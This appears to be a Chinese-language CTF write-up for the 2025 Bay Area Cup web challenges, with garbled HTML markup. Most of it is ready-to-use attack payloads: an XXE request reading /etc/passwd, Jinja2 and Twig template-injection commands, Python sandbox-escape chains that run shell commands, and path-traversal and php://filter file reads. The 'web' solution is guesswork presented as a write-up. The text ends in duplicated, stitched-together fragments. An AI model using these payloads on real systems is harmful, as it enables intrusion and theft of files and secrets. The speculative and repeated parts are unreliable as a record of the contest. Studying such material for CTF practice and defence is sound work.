2025年湾区杯网络安全大赛Web题解<\/h1>

概述<\/h2>
本文详细解析2025年湾区杯网络安全大赛中的Web类题目，包含解题思路、技术要点和完整利用过程。题目涵盖SSTI、Python沙箱逃逸、文件读取等常见Web安全漏洞。<\/p>

题目列表<\/h2>

web<\/strong> - 基础Web安全题目<\/li>
ssti<\/strong> - 服务器端模板注入漏洞<\/li>
ez_python<\/strong> - Python沙箱逃逸挑战<\/li>

easy_readfile<\/strong> - 文件读取漏洞利用<\/li> <\/ol>

1. web题目解析<\/h2>
关键信息<\/h3>

题目标识符：<toolId>19<\/toolId><\/code><\/li>
发布时间：2025-09-09 02:59<\/li>
作者：Mash1r0（北京）<\/li>
分类：CTF<\/li> <\/ul> 解题思路<\/h3> 信息收集<\/strong>：<\/p> 分析XML结构，注意<toolId><\/code>标签可能包含题目标识<\/li> 检查页面注释和隐藏字段<\/li> <\/ul> <\/li> 常见漏洞点<\/strong>：<\/p> XML外部实体注入（XXE）<\/li> 参数注入或IDOR（通过toolId参数）<\/li> 客户端安全控制绕过<\/li> <\/ul> <\/li> 利用方法<\/strong>：<\/p> POST<\/span> \/api\/tool HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> example.com<\/span> <\/span><\/span>Content-Type:<\/span> application\/xml<\/span> <\/span><\/span> <\/span><\/span><?xml version="1.0"?><\/span> <\/span><\/span><!DOCTYPE data [ <\/span><\/span><\/span> <!ENTITY xxe SYSTEM "file:\/\/\/etc\/passwd"><\/span> <\/span><\/span>]> <\/span><\/span><data><\/span> <\/span><\/span> <toolId><\/span>&xxe;<\/toolId><\/span> <\/span><\/span><\/data><\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 2. ssti（服务器端模板注入）<\/h2> 漏洞原理<\/h3> 服务端模板引擎（如Jinja2、Twig）未对用户输入过滤，导致模板代码执行。<\/p> 检测方法<\/h3> 输入{{7*7}}<\/code>测试是否返回49<\/li> 尝试${7*7}<\/code>（FreeMarker）或#{7*7}<\/code>（Thymeleaf）<\/li> <\/ul> 常用Payload<\/h3> Jinja2<\/strong>：<\/p> {{ config.<\/span>__class__.<\/span>__init__.<\/span>__globals__['os'<\/span>].<\/span>popen('id'<\/span>).<\/span>read() }} <\/span><\/span>{{ ''<\/span>.<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[407<\/span>]('cat \/flag'<\/span>,shell=<\/span>True<\/span>,stdout=-<\/span>1<\/span>).<\/span>communicate() }} <\/span><\/span><\/code><\/pre>Twig（PHP）<\/strong>：<\/p> {{_self<\/span>.<\/span>env<\/span>.<\/span>registerUndefinedFilterCallback<\/span>("exec"<\/span>)}} <\/span><\/span>{{_self<\/span>.<\/span>env<\/span>.<\/span>getFilter<\/span>("id"<\/span>)}} <\/span><\/span><\/code><\/pre>利用步骤<\/h3> 确定模板引擎类型<\/li> 获取内置对象和方法<\/li> 寻找OS命令执行途径<\/li> 读取flag或获取shell<\/li> <\/ol> 3. ez_python（Python沙箱逃逸）<\/h2> 常见限制<\/h3> 禁用import、open、eval等危险函数<\/li> 过滤特殊字符和关键字<\/li> 限制内置类和属性访问<\/li> <\/ul> 逃逸方法<\/h3> 方法1：通过继承链逃逸<\/strong><\/p> ().<\/span>__class__.<\/span>__base__.<\/span>__subclasses__()[132<\/span>].<\/span>__init__.<\/span>__globals__['popen'<\/span>]('whoami'<\/span>).<\/span>read() <\/span><\/span><\/code><\/pre>方法2：利用builtins<\/strong><\/p> [].<\/span>__class__.<\/span>__base__.<\/span>__subclasses__()[80<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>]('__import__("os").system("id")'<\/span>) <\/span><\/span><\/code><\/pre>方法3：通过异常处理<\/strong><\/p> >>><\/span> try<\/span>: raise<\/span> Exception<\/span>() <\/span><\/span>...<\/span> except<\/span> Exception<\/span> as<\/span> e: <\/span><\/span>...<\/span> print(e.<\/span>__traceback__.<\/span>tb_next.<\/span>tb_frame.<\/span>f_globals['__builtins__'<\/span>]['__import__'<\/span>]('os'<\/span>).<\/span>system('id'<\/span>)) <\/span><\/span><\/code><\/pre>过滤绕过技巧<\/h3> Unicode编码：__import__("\u006f\u0073")<\/code><\/li> 字符串拼接：__imp<\/code> + ort__<\/code><\/li> 属性链访问：getattr(__builtins__, '__imp'+'ort__')<\/code><\/li> <\/ul> 4. easy_readfile（文件读取漏洞）<\/h2> 常见漏洞点<\/h3> 路径遍历：..\/..\/etc\/passwd<\/code><\/li> PHP包装器：php:\/\/filter\/convert.base64-encode\/resource=index.php<\/code><\/li> 硬编码路径：直接读取已知位置文件<\/li> <\/ul> 利用Payload<\/h3> 基础路径遍历<\/strong>：<\/p> http:\/\/example.com\/download?file=..\/..\/..\/etc\/passwd <\/code><\/pre> 编码绕过<\/strong>：<\/p> file=....\/\/....\/\/....\/\/etc\/passwd file=..%2f..%2f..%2fetc%2fpasswd <\/code><\/pre> PHP过滤器<\/strong>：<\/p> php:\/\/filter\/convert.base64-encode\/resource=config.php php:\/\/filter\/string.rot13\/resource=index.php <\/code><\/pre> 利用日志文件<\/strong>：<\/p> file=\/var\/log\/apache2\/access.log <\/code><\/pre> 高级技巧<\/h3> 有限字符读取<\/strong>：<\/p> 使用php:\/\/filter\/read=string.toupper\/resource=file<\/code>转换内容<\/li> <\/ul> <\/li> SSRF结合文件读取<\/strong>：<\/p> file=http:\/\/127.0.0.1:8080\/admin <\/code><\/pre> <\/li> 配置文件读取<\/strong>：<\/p> \/proc\/self\/environ<\/code><\/li> \/proc\/self\/cmdline<\/code><\/li> \/proc\/self\/fd\/3<\/code><\/li> <\/ul> <\/li> <\/ol> 通用技巧<\/h2> 1. 信息收集<\/h3> 检查robots.txt<\/code><\/li> 查看页面源代码和注释<\/li> 分析JS文件中的API端点<\/li> <\/ul> 2. 目录爆破<\/h3> 常见敏感目录：<\/p> \/admin \/backup \/config \/.git \/.env <\/code><\/pre> 3. Header manipulation<\/h3> Host头注入<\/li> X-Forwarded-For绕过<\/li> Referer检查绕过<\/li> <\/ul> 防御建议<\/h2> 输入验证<\/strong>：严格过滤用户输入，特别是特殊字符<\/li> 最小权限<\/strong>：运行服务使用低权限用户<\/li> 沙箱隔离<\/strong>：危险操作应在隔离环境中执行<\/li> 日志监控<\/strong>：记录所有敏感操作和异常请求<\/li> 定期更新<\/strong>：保持框架和依赖库最新版本<\/li> <\/ol> 总结<\/h2> 本次比赛Web题目涵盖现代Web应用常见漏洞类型，解题需要结合多种技术手法。重点掌握SSTI的利用链构造、Python沙箱逃逸的对象链遍历以及文件读取的多种绕过方式。在实际渗透测试中，这些技术同样适用且效果显著。<\/p> 注意<\/strong>：本文仅用于网络安全学习研究，请勿用于非法用途。<\/p>

2025年湾区杯网络安全大赛Web题解<\/h1>

概述<\/h2> 本文详细解析2025年湾区杯网络安全大赛中的Web类题目，包含解题思路、技术要点和完整利用过程。题目涵盖SSTI、Python沙箱逃逸、文件读取等常见Web安全漏洞。<\/p>

1. web题目解析<\/h2>

2. ssti（服务器端模板注入）<\/h2>

漏洞原理<\/h3> 服务端模板引擎（如Jinja2、Twig）未对用户输入过滤，导致模板代码执行。<\/p>

3. ez_python（Python沙箱逃逸）<\/h2>

4. easy_readfile（文件读取漏洞）<\/h2>

通用技巧<\/h2>

概述<\/h2>
本文详细解析2025年湾区杯网络安全大赛中的Web类题目，包含解题思路、技术要点和完整利用过程。题目涵盖SSTI、Python沙箱逃逸、文件读取等常见Web安全漏洞。<\/p>

漏洞原理<\/h3>
服务端模板引擎（如Jinja2、Twig）未对用户输入过滤，导致模板代码执行。<\/p>